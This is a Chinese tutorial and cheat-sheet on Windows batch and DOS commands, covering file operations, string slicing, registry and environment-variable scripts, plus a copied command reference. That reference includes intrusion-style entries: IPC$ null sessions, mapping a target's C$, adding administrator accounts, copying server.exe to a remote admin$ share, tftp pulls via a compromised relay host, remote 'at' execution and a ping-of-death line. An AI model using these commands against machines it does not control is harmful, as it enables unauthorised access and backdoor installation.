bat命令文件操作

在做空间数据处理(切片、栅格、矢量等)的时候,数据量总是庞大的,有时候又不想开一个专门的程序执行大量、重复的文件操作,windows本身自带的bat命令是个很好的选择(简单,处理速度快)。

1 dir 该命令可以获取某个文件夹下所有的文件名及扩展

dir #显示当前目录中的文件和子目录

dir /a #显示当前目录中的文件和子目录,包括隐藏文件和系统文件

dir c: /a:d #显示 C 盘当前目录中的目录

dir c: /a:-d #显示 C 盘根目录中的文件

dir c: /b/p #/b只显示文件名,/p分页显示

dir *.exe /s #显示当前目录和子目录里所有的.exe文件

2 cd 该命令用于进入当前文件夹,以便执行程序或其他操作

cd #进入根目录

cd #显示当前目录

cd /d d:\sdk #可以同时切换盘符和目录

3 md 该命令用于创建文件或文件夹

md d:\a\b\c #如果 d:\a 不存在,将会自动创建中级目录

#如果命令扩展名被停用,则需要键入 mkdir \a\b\c。

4 rd 该命令用于删除文件夹相关内容,比单一的del 删除文件操作权限大

rd abc #删除当前目录里的 abc 子目录,要求为空目录

rd /s/q d:\temp #删除 d:\temp 文件夹及其子文件夹和文件,/q安静模式

5 del 删除文件

del d:\test.txt #删除指定文件,不能是隐藏、系统、只读文件

del /q/a/f d:\temp\ *.*

删除 d:\temp 文件夹里面的所有文件,包括隐藏、只读、系统文件,不包括子目录

del /q/a/f/s d:\temp\ *.*

删除 d:\temp 及子文件夹里面的所有文件,包括隐藏、只读、系统文件,不包括子目录

1) 删除一个文件或多个文件
del /s /q /f d:\test\a.bat
将直接删除d:\test\a.bat,没有任务提示
del temp\* /q /f /s
将直接删除 本目录的 temp 目录的所有文件,没有任务提示
删除文件的时候可以使用“*”作通配符
2) 删除一个空目录
rd /q /s d:\test\log
将直接删除d:\test\log目录,如果log目录里面有文件将无法删除
3) 删除一个非空目录 (必须指定目录名称)
rmdir /q /s d:\test\logs
必须指定目录名称,不能使用通配符
/S 除目录本身外,还将删除指定目录下的所有子目录
/Q 安静模式,带 /S 删除目录树时不要求确认
无论里面是否有文件或文件夹将全部直接删除
6 copy 拷贝文件

copy c:\test.txt d:\test.bak

7 xcopy 拷贝文件,外部命令

xcopy d:\mp3 e:\mp3 /s/e/i/y

复制 d:\mp3 文件夹、所有子文件夹和文件到 e:\,覆盖已有文件

加 /i 表示如果 e:\ 没有 mp3 文件夹就自动新建一个,否则会有询问

8pause 暂停命令

pause 暂停执行,按任意键继续。。。。。。

Sample:
@echo off
:begin
copy a:\ *.* d:\back
echo Please put a new disk into driver A
pause

9 find 查找命令

find "abc" c:\test.txt

在 c:\test.txt 文件里查找含 abc 字符串的行

如果找不到,将设 errorlevel 返回码为1

find /i “abc” c:\test.txt

查找含 abc 的行,忽略大小写

find /c "abc" c:\test.txt

显示含 abc 的行的行数

字符串处理
1) 分割字符串,以查看时间为例
%源字符串:~起始值,截取长度% (起始值从0开始;截取长度是可选的,如果省略逗号和截取长度,将会从起始值截取到结尾;
截取长度如果是负数,表示截取到倒数第几个。)
"%time%" 显示如:"11:04:23.03" (完整的时间"hh:mm:ss.tt")
"%time:~0,5%" 显示"hh:mm"(即"11:04"),其中0表示从右向左移位操作的个数,5表示从左向右移位操作的个数
"%time:~0,8%" 显示标准时间格式"hh:mm:ss"(即"11:04:23",前8个字符串)
"%time:~3,-3%"显示"mm:ss"(即从第4个开始,截去最后3个的字符串)
"%time:~3%" 显示"04:23.03"(即去掉前4个字符串)
"%time:~-3%" 显示".tt"(即最后3个字符串)
上面的字串分割格式,也可以用于其它地方,如目录路径:"%cd:~0,10%"
10 pushd 和 popd 切换当前目录

@echo off

c: & cd & md mp3 #在 C:\建立 mp3 文件夹

md d:\mp4 #在 D:\ 建立 mp4 文件夹

cd /d d:\mp4 #更改当前目录为 d:\mp4

pushd c:\mp3 #保存当前目录,并切换当前目录为 c:\mp3

popd #恢复当前目录为刚才保存的 d:\mp4

11start 外部调用程序命令

批处理中调用外部程序的命令,否则等外部程序完成后才继续执行剩下的指令

12 set 设置命令

设置变量

引用变量可在变量名前后加 % ,即 %变量名%

set #显示目前所有可用的变量,包括系统变量和自定义的变量

13 > 和 >> 输出从定向命令

输出重定向命令

> 清除文件中原有的内容后再写入

>> 追加内容到文件末尾,而不会清除原有的内容

主要将本来显示在屏幕上的内容输出到指定文件中

指定文件如果不存在,则自动生成该文件

type c:\test.txt >prn

屏幕上不显示文件内容,转向输出到打印机

14 | 管道命令

dir *.* /s/a | find /c ".exe"

管道命令表示先执行 dir 命令,对其输出的结果执行后面的 find 命令

该命令行结果:输出当前文件夹及所有子文件夹里的.exe文件的个数

type c:\test.txt|more

这个和 more c:\test.txt 的效果是一样的

15 &顺序执行多条命令,而不管命令是否执行成功

16 &&顺序执行多条命令,当碰到执行出错的命令后将不执行后面的命令

find "ok" c:\test.txt && echo 成功

如果找到了"ok"字样,就显示""成功"",找不到就不显示

17||顺序执行多条命令,当碰到执行正确的命令后将不执行后面的命令

find "ok" c:\test.txt || echo 不成功

如果找不到"ok"字样,就显示"不成功",找到了就不显示

18 /?help 命令

Sample: type /? >>tmp.txt (把 type 命令的帮助信息写入到tmp.txt文件里)

19echo 打开回显或关闭回显功能

打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。

Sample: echo off
Sample: echo hello world (显示出“hello world”)

以上是操作文件时常用的一些命令,常常是一句或几句编码就可执行。至于一些较为复杂的操作如call if for choise等命令并不常用,如果想深入了解一些系统、网络等命令,还是得花一番心思的,不详述,俺也不会啦%^#%&$@#$@$

copy 一份别人的好东西,什么时候用用。

实践部分:
======================================================================

一、小摘录:
1. 调用其他程序时,对文件的大小写不敏感,文件后缀也可忽略
如:start LeapFTP.exe 与 start leapftp 效果一样,都是运行“LeapFTP.exe”文件
每行的开头的字符串会自动查找程序来运行,还可用双引号引起来(文件名或目录名含空格时必须用)
如:"D:\Program Files\Leap FTP.exe"
"LeapFTP.exe" 可正常运行文件,start "" "LeapFTP.exe" 也可以正常运行文件(注意,第一个参数是窗口显示的标题)
3. copy C:\test\*.* D:\back (复制C盘test文件夹的所有文件(不包括文件夹及子文件夹里的东西)到D盘的back文件夹)
4. dir c:\*.* > a.txt (将c盘文件列表写入 a.txt 中)
5. > 生成文件并写入内容(如果有这文件则覆盖), >> 文件里追加内容
6. md d:\aa (创建文件夹)
7. 在命令末尾加上“>NUL 2>NUL”,表示隐蔽返回信息。
8. 等待用户输入: set /p 变量名=屏幕显示信息。 Sample:set /p pass=请输入密码:
9. 让用户按回车退出
小技巧(替代pause),文件的最后一句:set /p tmp=操作结束,请按回车键退出...
10.设置标题: title JDK安装
11.设置屏幕显示颜色,如绿色: color 0a
12.清屏: cls
13.查看自己的IP:
for /f "tokens=15" %%i in ('ipconfig ^| find /i "ip address"') do set ip=%%i
echo %ip% (这时的 %ip% 就是自己的IP地址)

14. 修改文件的更新日期
copy 文件名+,,>nul (修改为当前时间,如果要修改为指定时间,先修改系统时间,再改回系统时间)
15. 修改文件的后缀名
ren C:\test\*.jpg *.JPG
for /r %%c in (*.jpg) do (ren %%c *.JPG) :: 修改当前目录下的所有文件的后缀名,包括子目录的
16. 修改文件的文件名
rename test.jpg test2.JPG
rename *.jpg *.888.JPG
17. 查看DNS、IP、Mac等
1) Win98: winipcfg
2) Win2000以上: Ipconfig /all
3) NSLOOKUP
18.查看IP上的共享资源,就可以
net view 192.168.10.8
19.共享
A.查看你机器的共享资源: net share
B.手工删除共享
net share 共享资源名称$ /d
注意$后有空格。
C.增加一个共享:
net share mymovie=e:\downloads\movie /users:3
mymovie 共享成功。 同时限制链接用户数为3人。
20.打开某网站
start iexplore.exe http://www.baidu.com


二、实例:
1. 生成 reg 文件,运行它,再删除它
echo "更改windows安装文件的路径"
echo Windows Registry Editor Version 5.00 > c:\setupreg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup] >> c:\setupreg.reg
echo "ServicePackSourcePath"="D:\\Win2003\\" >> c:\setupreg.reg
echo "SourcePath"="D:\\Win2003\\" >> c:\setupreg.reg
:: 写入注册表
regedit /S c:\setupreg.reg
:: 删除注册表文件
del c:\setupreg.reg

2.调用了exe文件,结束后没有关闭,解决方式
用start命令运行文件,如:
start LeapFTP.exe 192.168.0.100

3.设置系统环境变量
:: 有这个环境变量,则不需再设置,直接结束
if not "%JAVA_HOME%" == "" exit
:: 设置环境变量的地址
set inputJavaHome=%cd%\jdk1.6.0_07
:: 设置环境变量,也可以设置当前用户的变量
set EnvironmentHome=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
echo 正在设置环境变量,请稍候......
reg add "%EnvironmentHome%" /v JAVA_HOME /t reg_sz /d "%inputJavaHome%" /f
reg add "%EnvironmentHome%" /v ClassPath /t reg_sz /d ".;%%JAVA_HOME%%\lib" /f
reg add "%EnvironmentHome%" /v Path /t reg_sz /d "%%JAVA_HOME%%\bin;%Path%" /f]
:: 刷新,令环境变量生效
taskkill /f /im explorer.exe >nul
start "" "explorer.exe"

4.隐藏某目录的所有文件及文件夹
cd /d 要隐藏的目录(如:D:)
for /f "usebackq delims=" %%A in (`dir /a /b`) do (attrib "%%A" -r +h -s)

5.在批处理中使用密码。密码为admin,输入正确,跳转到next1 ,若输入密码错误3次,则锁屏。。
@echo off
set num=0
:11
set /p pass=请输入密码:
if "%pass%"=="admin" goto next1
set /a num=%num% + 1
if %num%==3 goto no1
goto 11
:no1
%windir%\system32\rundll32.exe user32.dll,LockWorkStation
goto 11
:next1
echo 密码正确,执行下面的程式
pause

6.清空回收站(未成功)
@echo off
del /f /s /q c:\recycler\*.*
::刷新屏幕
taskkill /f /im explorer.exe >nul
start "" "explorer.exe"

7.让系统断断续续地鸣叫
@echo off
:begin
:: 发出鸣叫(“”实际就是ASCII码值为7的特殊字符(蜂鸣键beep)
echo
:: 让程序暂停一小阵子
ping -n 1 -l 1 127.1>nul
goto :begin

8.将 FAT 卷转换成 NTFS
利用“CONVERT.exe”进行,解析如下:
CONVERT volume /FS:NTFS [/V] [/CvtArea:filename] [/NoSecurity] [/X]
volume 指定驱动器号(后面跟一个冒号)、装载点或卷名。
/FS:NTFS 指定要被转换成 NTFS 的卷。
/V 指定 Convert 应该用详述模式运行。
/CvtArea:filename
将根目录中的一个接续文件指定为NTFS 系统文件的占位符。
/NoSecurity 指定每个人都可以访问转换的文件和目录的安全设置。
/X 如果必要,先强行卸载卷。该卷的所有打开的句柄则无效。

程序如下:
@ ECHO OFF
@ ECHO.
@ ECHO. 说 明
@ ECHO --------------------------------------------------------------------------
@ ECHO NTFS是一种磁盘格式。该格式能存放大于4G的单个文件(如高清电影文件),并可对
@ ECHO 文件夹进行加密,但有个缺点是DOS下无法访问。建议D盘及其后的盘使用NTFS格式,
@ ECHO C盘如非必要可以不转换,FAT32与NTFS这两种格式的读写速度几乎是没有差别的。
@ ECHO --------------------------------------------------------------------------
@ ECHO.
convert c: /fs:ntfs
:: D盘也转成 NTFS
convert d: /fs:ntfs

9. 获取我的文档
SET SF="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
FOR /F "tokens=2,*" %%I IN ('REG QUERY %SF% /v Personal 2^>NUL^|FIND /I "Personal"') DO SET "myDoc=%%~J"
:: 复制文件到我的文档
XCOPY /D /E /R /Y /C "%cd%\test.txt" "%myDoc%\test\"


==========================================
实例:
3.IF-ERRORLEVEL
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO 文件拷贝失败
IF ERRORLEVEL 0 ECHO 成功拷贝文件

如果文件拷贝成功,屏幕就会显示“成功拷贝文件”,否则就会显示“文件拷贝失败”。
IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的,注意只是上一个命令的返回值,而且返回值必须依照从大到小次序顺序判断。因此下面的批处理文件是错误的:
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
CHO 成功拷贝文件
IF ERRORLEVEL 1 ECHO 未找到拷贝文件
IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作
IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作
IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误
无论拷贝是否成功,后面的:
未找到拷贝文件
用户通过ctrl-c中止拷贝操作
预置错误阻止文件拷贝操作
拷贝过程中写盘错误
都将显示出来。

以下就是几个常用命令的返回值及其代表的意义:
backup
0 备份成功
1 未找到备份文件
2 文件共享冲突阻止备份完成
3 用户用ctrl-c中止备份
4 由于致命的错误使备份操作中止
diskcomp
0 盘比较相同
1 盘比较不同
2 用户通过ctrl-c中止比较操作
3 由于致命的错误使比较操作中止
4 预置错误中止比较
diskcopy
0 盘拷贝操作成功
1 非致命盘读/写错
2 用户通过ctrl-c结束拷贝操作
3 因致命的处理错误使盘拷贝中止
4 预置错误阻止拷贝操作
format
0 格式化成功
3 用户通过ctrl-c中止格式化处理
4 因致命的处理错误使格式化中止
5 在提示“proceed with format(y/n)?”下用户键入n结束
xcopy
0 成功拷贝文件
1 未找到拷贝文件
2 用户通过ctrl-c中止拷贝操作
4 预置错误阻止文件拷贝操作
5 拷贝过程中写盘错误


=============================================================
@echo off //不显示shell的命令。
Setlocal //环境改变只适用于这个文件。
%OS% //为当前的操作系统。
Rem //注释一行文本。
Goto 标签 //改变执行顺序,去标签位置.
:标签 //定义一个标签。
Set 变量名=值 //定义变量
Not //取反
Netstat –na //显示当前被点用的端口.
%0 %1 %2 //用于表示批处理文件的参数0为命令,共1-9个参数。
Shift //用于向前一个参数,原1变0,原2变1.每调用一次shift向前一移动一位。
Call //调用其他批处理文件或命令。
Start 命令 参数 //指示出在另一个窗口中开始运行命令。


=============================================================
:: 这段批处理程序可以自动设置Java环境变量

@echo off
IF EXIST %1\bin\java.exe (
rem 如输入正确的 Java2SDK 安装目录,开始设置环境变量
@setx JAVA_HOME %1
@setx path %path%;%JAVA_HOME%\bin
@setx classpath %classpath%;.
@setx classpath %classpath%;%JAVA_HOME%\lib\tools.jar
@setx classpath %classpath%;%JAVA_HOME%\lib\dt.jar
@setx classpath %classpath%;%JAVA_HOME%\jre\lib\rt.jar
@echo on
@echo Java 2 SDK 环境参数设置完毕,正常退出。
) ELSE (
IF "%1"=="" (
rem 如没有提供安装目录,提示之后退出
@echo on
@echo 没有提供 Java2SDK 的安装目录,不做任何设置,现在退出环境变量设置。
) ELSE (
rem 如果提供非空的安装目录但没有bin\java.exe,则指定的目录为错误的目录
@echo on
@echo 非法的 Java2SDK 的安装目录,不做任何设置,现在退出环境变量设置。
)
)



dos命令参考~~~
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名  开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
2ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 /?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
部分摘自:

https://www.cnblogs.com/jjzd/p/6902176.html

https://blog.csdn.net/haibo19981/article/details/52161653

DOS命令分为内部命令和外部命令,内部命令是随每次启动的COMMAND.COM装入并常驻内存,而外部命令是一条单独的可执行文件。在操作时要记住的是,内部命令在任何时候都可以使用,而外部命令需要保证命令文件在当前的目录中,或在Autoexec.bat文件已经被加载了路径。DOS由ROM-BIOS、IO.SYS,MS-DOS.SYS,COMMAND.COM四块组成,ROM-BIOS是DOS的基本引导程序,在主存芯片上,引导IO.SYS和MS-DOS.SYS进入主存;

IO.SYS是设备驱动模块,由模块SYSINIT和IO.SYS构成DOS的基本输入|输出系统BIOS;

MS-DOS.SYS是系统内核,如同windows的NT内核;COMMAND.COM是命令解析程序,!它包含了所有内部命令,并存放在内存;外部命令是一个个单独的可执行文件,存放于磁盘c:\windows\ststem32,扩展名为com和exe。DOS结构:外部命令->COMMAND.COM->MS-DOS.SYS->IO.SYS->BIOS。

DOS程序基本组成部分有变量、控制语句、函数、bat嵌套和DOS内部与外部命令。

附件一:DOS内部命令

在CMD窗口下,输入help:

ASSOC 显示或修改文件扩展名关联。
ATTRIB 显示或更改文件属性。
BREAK 设置或清除扩展式 CTRL+C 检查。
BCDEDIT 设置启动数据库中的属性以控制启动加载。
CACLS 显示或修改文件的访问控制列表(ACL)。
CALL 从另一个批处理程序调用这一个。
CD 显示当前目录的名称或将其更改。
CHCP 显示或设置活动代码页数。
CHDIR 显示当前目录的名称或将其更改。
CHKDSK 检查磁盘并显示状态报告。
CHKNTFS 显示或修改启动时间磁盘检查。
CLS 清除屏幕。
CMD 打开另一个 Windows 命令解释程序窗口。
COLOR 设置默认控制台前景和背景颜色。
COMP 比较两个或两套文件的内容。
COMPACT 显示或更改 NTFS 分区上文件的压缩。
CONVERT 将 FAT 卷转换成 NTFS。你不能转换当前驱动器。
COPY 将至少一个文件复制到另一个位置。
DATE 显示或设置日期。
DEL 删除至少一个文件。
DIR 显示一个目录中的文件和子目录。
DISKPART 显示或配置磁盘分区属性。
DOSKEY 编辑命令行、撤回 Windows 命令并创建宏。
DRIVERQUERY 显示当前设备驱动程序状态和属性。
ECHO 显示消息,或将命令回显打开或关闭。
ENDLOCAL 结束批文件中环境更改的本地化。
ERASE 删除一个或多个文件。
EXIT 退出 CMD.EXE 程序(命令解释程序)。
FC 比较两个文件或两个文件集并显示
它们之间的不同。
FIND 在一个或多个文件中搜索一个文本字符串。
FINDSTR 在多个文件中搜索字符串。
FOR 为一组文件中的每个文件运行一个指定的命令。
FORMAT 格式化磁盘,以便用于 Windows。
FSUTIL 显示或配置文件系统属性。
FTYPE 显示或修改在文件扩展名关联中使用的文件类型。
GOTO 将 Windows 命令解释程序定向到批处理程序中某个带标签的行。
GPRESULT 显示计算机或用户的组策略信息。
GRAFTABL 使 Windows 在图形模式下显示扩展字符集。
HELP 提供 Windows 命令的帮助信息。
ICACLS 显示、修改、备份或还原文件和目录的 ACL。
IF 在批处理程序中执行有条件的处理操作。
LABEL 创建、更改或删除磁盘的卷标。
MD 创建一个目录。
MKDIR 创建一个目录。
MKLINK 创建符号链接和硬链接
MODE 配置系统设备。
MORE 逐屏显示输出。
MOVE 将一个或多个文件从一个目录移动到另一个目录。
OPENFILES 显示远程用户为了文件共享而打开的文件。
PATH 为可执行文件显示或设置搜索路径。
PAUSE 暂停批处理文件的处理并显示消息。
POPD 还原通过 PUSHD 保存的当前目录的上一个值。
PRINT 打印一个文本文件。
PROMPT 更改 Windows 命令提示。
PUSHD 保存当前目录,然后对其进行更改。
RD 删除目录。
RECOVER 从损坏的或有缺陷的磁盘中恢复可读信息。
REM 记录批处理文件或 CONFIG.SYS 中的注释(批注)。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RMDIR 删除目录。
ROBOCOPY 复制文件和目录树的高级实用工具
SET 显示、设置或删除 Windows 环境变量。
SETLOCAL 开始本地化批处理文件中的环境更改。
SC 显示或配置服务(后台进程)。
SCHTASKS 安排在一台计算机上运行命令和程序。
SHIFT 调整批处理文件中可替换参数的位置。
SHUTDOWN 允许通过本地或远程方式正确关闭计算机。
SORT 对输入排序。
START 启动单独的窗口以运行指定的程序或命令。
SUBST 将路径与驱动器号关联。
SYSTEMINFO 显示计算机的特定属性和配置。
TASKLIST 显示包括服务在内的所有当前运行的任务。
TASKKILL 中止或停止正在运行的进程或应用程序。
TIME 显示或设置系统时间。
TITLE 设置 CMD.EXE 会话的窗口标题。
TREE 以图形方式显示驱动程序或路径的目录结构。
TYPE 显示文本文件的内容。
VER 显示 Windows 的版本。
